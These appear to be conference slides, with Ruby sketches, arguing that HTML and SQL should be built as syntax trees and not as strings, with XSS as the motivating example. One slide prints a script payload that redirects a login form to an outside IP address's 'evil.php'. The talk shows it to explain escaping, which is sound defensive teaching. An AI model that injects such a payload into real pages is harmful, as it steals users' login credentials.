tl;dr (in Haiku)

For formal language

Avoid plain strings at all cost

Use data structures

Language

langue, taal, sprache, 語言

[Figure: syntax tree of the sentence. sentence → subject (platypus), action (verb: carry; object: chicken), place (forest)]

A platypus is carrying a chicken in the forest

Magic of language

Formal Language

a formal language is

a set of strings of symbols

governed by strict rules

These rules form the grammar

of the language, they specify

how to generate valid strings

alphabet = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
            +, *, (, ), =}

<equation>   ::= <expression> = <expression>

<expression> ::= <number>  | <sum> |
                 <product> | ( <expression> )

<number>     ::= <digit> | <digit> <number>

<digit>      ::= 0 | 1 | 2 | 3 | 4 |
                 5 | 6 | 7 | 8 | 9

<sum>        ::= <expression> + <expression>

<product>    ::= <expression> * <expression>

well-formed :

5 = 3 + 2
4 * 4 = 10 + 6
10 + 20 = ( 3 + 5 ) * 7

 

not well-formed :

5 = + 5
10 = 15 - 5
3 * 5 + 7

[Figure: syntax tree of the equation 5 + 3 = 2 * 4. equation → expression (sum: number 5, +, number 3), =, expression (product: number 2, *, number 4)]
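
As a rough illustration, the grammar above can be turned into a small recursive-descent parser that either returns a syntax tree or rejects the input. This is only a sketch: the class name `EquationParser`, the helper `well_formed?` and the nested-array tree format are made up for this example, and it assumes that `*` binds tighter than `+` and that both associate to the left, which the grammar on the slide leaves open.

```ruby
# Parser for the equation grammar: digits, +, *, (, ) and =.
# Assumption (not in the grammar): * binds tighter than +, both left-associative.
class EquationParser
  def initialize(input)
    @tokens = tokenize(input)
  end

  # Returns a tree such as [:equation, left, right];
  # raises ArgumentError when the input is not well-formed.
  def parse
    left = expression
    expect('=')
    right = expression
    raise ArgumentError, "unexpected #{@tokens.first.inspect}" unless @tokens.empty?
    [:equation, left, right]
  end

  private

  # Splits the input into numbers and single symbols, rejecting anything
  # that is not in the alphabet.
  def tokenize(input)
    input.scan(/\d+|\S/).each do |token|
      next if token.match?(/\A(\d+|[+*()=])\z/)
      raise ArgumentError, "not in the alphabet: #{token.inspect}"
    end
  end

  def expression
    node = term
    node = [:sum, node, term] while accept('+')
    node
  end

  def term
    node = factor
    node = [:product, node, factor] while accept('*')
    node
  end

  def factor
    if accept('(')
      node = expression
      expect(')')
      node
    elsif @tokens.first&.match?(/\A\d+\z/)
      [:number, @tokens.shift.to_i]
    else
      raise ArgumentError, "expected a number or '(', got #{@tokens.first.inspect}"
    end
  end

  # Consumes the next token if it equals symbol; returns nil otherwise.
  def accept(symbol)
    @tokens.shift if @tokens.first == symbol
  end

  def expect(symbol)
    accept(symbol) or raise ArgumentError, "expected #{symbol.inspect}, got #{@tokens.first.inspect}"
  end
end

# Hypothetical convenience wrapper: true when the string parses.
def well_formed?(string)
  EquationParser.new(string).parse
  true
rescue ArgumentError
  false
end

p EquationParser.new('5 + 3 = 2 * 4').parse
# [:equation, [:sum, [:number, 5], [:number, 3]], [:product, [:number, 2], [:number, 4]]]
```

With this sketch, `well_formed?('5 = + 5')`, `well_formed?('10 = 15 - 5')` and `well_formed?('3 * 5 + 7')` all return `false`, matching the examples listed above.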

The meaning of a sentence

corresponds with

its syntax tree

Language is everywhere

Your application either

consumes or generates

these languages

In either case it should

use syntax trees

to do so

Why ?

XSS

Cross site scripting

XSS

Code like this

"<div>#{ @post.body }</div>"

   

Will lead to malicious injection

document.getElementById('login_form').
  action="http://208.246.24.14/evil.php"

session hijacking

attacker can surf the site with user credentials

Escape!

The common wisdom is to "escape" the inserted value

<div>#{ escape_html(@post.body) }</div>

   

Now the code is harmless

<div>
  &lt;script&gt;document.getElementById('login_form').action=&quot;http://208.246.24.14/evil.php&quot;&lt;/script&gt;
</div>
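
A minimal sketch of the difference between the two templates above. It assumes `ERB::Util.html_escape` from Ruby's standard library as a stand-in for the slide's `escape_html`; the variable names and the attacker-supplied body are made up for the example.

```ruby
require 'erb'

# Hypothetical post body supplied by an attacker.
body = %q{<script>document.getElementById('login_form').action="http://208.246.24.14/evil.php"</script>}

# Plain interpolation: the markup in the body becomes part of the page.
unsafe = "<div>#{body}</div>"

# Escaped interpolation: &, <, >, " and ' are replaced by character references,
# so the browser shows the body as text instead of running it.
safe = "<div>#{ERB::Util.html_escape(body)}</div>"

puts unsafe
puts safe
```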

XSS

Is a more common

vulnerability than

buffer overflows

[CVE-2013-1857] XSS Vulnerability
in the sanitize helper of Ruby on Rails

  — @tenderlove on rails-security-ann

Given all the fun we've had with security issues

  — Rails 4 beta announcement

 

why is it so hard?

 

What side of the escape are we on?

Steps to reproduce

escape_html(
  escape_html(
    'ó'.force_encoding('ISO-8859-1')
       .encode('UTF-8')
       .sub('Ã', '&atilde;')
       .sub('³','&sup3;')))
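
The core of the problem can be shown with less machinery: escaping is not idempotent, so a plain string alone does not tell you whether it has been escaped yet. A small sketch, again assuming `ERB::Util.html_escape` in place of the slide's `escape_html`:

```ruby
require 'erb'

text  = 'Fish & Chips'
once  = ERB::Util.html_escape(text)  # "Fish &amp; Chips"
twice = ERB::Util.html_escape(once)  # "Fish &amp;amp; Chips"

# All three are ordinary Strings; nothing in the value records
# which side of the escape it is on.
puts text, once, twice
```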

Manual escaping? hard

Let's automate!

# using HTML::SafeBuffer
<div><%= @post.body %></div>

And it just works

We've turned the problem around

Whitelist instead of blacklist

def helper
  "<p> haikus are pretty </p>".html_safe
end

 

We're still manually deciding what (not) to escape
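
To make the mechanism concrete, here is a simplified sketch of the idea behind a safe buffer: a String subclass that escapes everything appended to it unless the appended value is itself marked as safe. `SafeString` is a hypothetical class written for this example, not the Rails implementation.

```ruby
require 'erb'

# Hypothetical, simplified "safe buffer": a String whose contents are trusted.
class SafeString < String
  # Appending escapes the argument unless it is already a SafeString.
  def <<(other)
    super(SafeString.escape(other))
  end

  def self.escape(value)
    value.is_a?(SafeString) ? value : ERB::Util.html_escape(value.to_s)
  end
end

user_input = '<script>alert(1)</script>'

# Plain strings are escaped automatically when appended.
page = SafeString.new('')
page << SafeString.new('<div>') << user_input << SafeString.new('</div>')
puts page  # <div>&lt;script&gt;alert(1)&lt;/script&gt;</div>

# But marking a value as safe is still a manual decision, and it can be wrong.
oops = SafeString.new('') << SafeString.new(user_input)
puts oops  # <script>alert(1)</script>
```

The default has flipped from "trusted unless escaped" to "escaped unless trusted", but the trust mark is a flag on a string, not a property of its structure.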

The problem

The semantics of a string are twofold

[Figure: communication. A tree on the sending side passes through a serializer, travels over the network, and is turned back into a tree by a parser on the receiving side. In the last variant the serializer is gone and an unknown source ("???") writes straight to the network.]

this is not a new concept

we already do this for SQL

@users = User.where(name: params[:query])

[Figure: the #<AR::Relation> as a syntax tree. SELECT (field *), FROM (table users), WHERE (eq: field name, string "query")]

def helper
  "<p> haikus are pretty </p>".html_safe
end

[Figure: the helper returns a flat String "<p> haikus are pretty </p>" with @html_safe=true]
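
The contrast can be sketched in a few lines. In the SQL case the user's value is a leaf in a tree, and only the serializer decides how it reaches the database. The node names and the `to_sql` function below are made up for this illustration; they are not ActiveRecord's or Arel's internal representation.

```ruby
# Hypothetical mini query tree: [type, *children].
query = [:select, [:field, '*'],
         [:from, [:table, 'users']],
         [:where, [:eq, [:field, 'name'], [:string, "Robert'); DROP TABLE users;--"]]]]

# Serializes the tree to SQL with placeholders; user-supplied strings are
# collected in binds and never become part of the SQL text.
def to_sql(node, binds)
  type, *children = node
  case type
  when :select
    fields, from, where = children
    "SELECT #{to_sql(fields, binds)} #{to_sql(from, binds)} #{to_sql(where, binds)}"
  when :from
    "FROM #{to_sql(children.first, binds)}"
  when :where
    "WHERE #{to_sql(children.first, binds)}"
  when :eq
    "#{to_sql(children[0], binds)} = #{to_sql(children[1], binds)}"
  when :field, :table
    children.first # assumption: identifiers come from the program, not from users
  when :string
    binds << children.first
    '?'
  else
    raise ArgumentError, "unknown node #{type.inspect}"
  end
end

binds = []
sql = to_sql(query, binds)
puts sql            # SELECT * FROM users WHERE name = ?
puts binds.inspect
```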

HTML

Language, a set of strings

Browsers accept every string

Is this a language?

Postel's principle

Be conservative in what you send

be liberal in what you accept

 


 

 

HTML "parsers" are rewriting engines

To stay safe we should stay strict

Let someone else handle this hairy mess

Why? (cont.)

in case security

is not enough for you

higher level of abstraction

is more expressive

and more productive

How?

Shopping list

  1. A solid data type for syntax trees
  2. Quality parsers and generators
  3. Problem-domain-specific APIs for working with those trees

Apples and snakes architecture

Keep the snakes out of the app

parse/generate at the app boundary

Inside the app, only apples

Building trees

Constructing literals

The data structure must be

composable and

easy to reason about

Objects

require 'nokogiri'
@doc = Nokogiri::HTML::Document.new
@html = Nokogiri::XML::Element.new('html', @doc)
@doc << @html   # attach the root element to the document
@doc.to_html    # serialize only at the very end

Builder syntax

HTML::Builder.new do
  html do
    body do
      p 'hello, world'
    end
  end
end

Templating

%div
  .big
    = "Hello RuLu"

S-expressions

'(p (em "hello, world"))

 

[:p, [:em, "hello, world"]]
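
A minimal sketch of what serializing such a nested array might look like. The `render` function is hypothetical and written only for this example (it is not the Hexp API). It assumes nodes of the form `[tag, *children]` with no attributes and no void elements, and that tag names come from the program rather than from user input.

```ruby
require 'erb'

# Serializes [tag, *children] to HTML. Arrays are elements, anything else is
# text, and text is always escaped here, in exactly one place.
def render(node)
  case node
  when Array
    tag, *children = node
    "<#{tag}>#{children.map { |child| render(child) }.join}</#{tag}>"
  else
    ERB::Util.html_escape(node.to_s)
  end
end

puts render([:p, [:em, "hello, world"]])
# <p><em>hello, world</em></p>
puts render([:p, "<script>alert(1)</script>"])
# <p>&lt;script&gt;alert(1)&lt;/script&gt;</p>
```

Because text and markup are different kinds of values in the tree, there is no question of which side of the escape a given value is on.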

Now you can actually program your HTML

class MyController
  def index
    page = SignupPage.new
    if request.post?
      page.rewrite(PopulateFormFields.new(params))
    end
    render Layout.new(page)
  end
end
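
The `rewrite` call in the controller above is not defined on the slides. As a rough idea of what rewriting a tree can mean, here is a hypothetical `rewrite` function over `[tag, *children]` arrays that rebuilds the tree bottom-up and passes every element through a block. The function and the example page are assumptions made for this sketch.

```ruby
# Rebuilds a [tag, *children] tree bottom-up, passing each element node
# through the block. Text nodes (non-Arrays) are returned unchanged.
def rewrite(node, &block)
  return node unless node.is_a?(Array)
  tag, *children = node
  block.call([tag, *children.map { |child| rewrite(child, &block) }])
end

page = [:div, [:p, [:em, "hello"], ", world"]]

# Replace every <em> with <strong>; all other nodes pass through as they are.
bold = rewrite(page) do |node|
  node.first == :em ? [:strong, *node.drop(1)] : node
end

p bold  # [:div, [:p, [:strong, "hello"], ", world"]]
p page  # the original tree is left unchanged
```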

Hexp

Demo

https://github.com/plexus/hexp

In summary

Don't serialize by hand

Don't reinvent the wheel (badly)

Mixing serialization (s11n) with logic violates the single responsibility principle (SRP)

Let a library do the serialization for you

Aim high level

You care about semantics

the closest representation

is the syntax tree

More expressive power

Data structures are programmable

they make your code

more powerful and expressive

Oh and BTW

injection attacks

Q ?

Thank you!
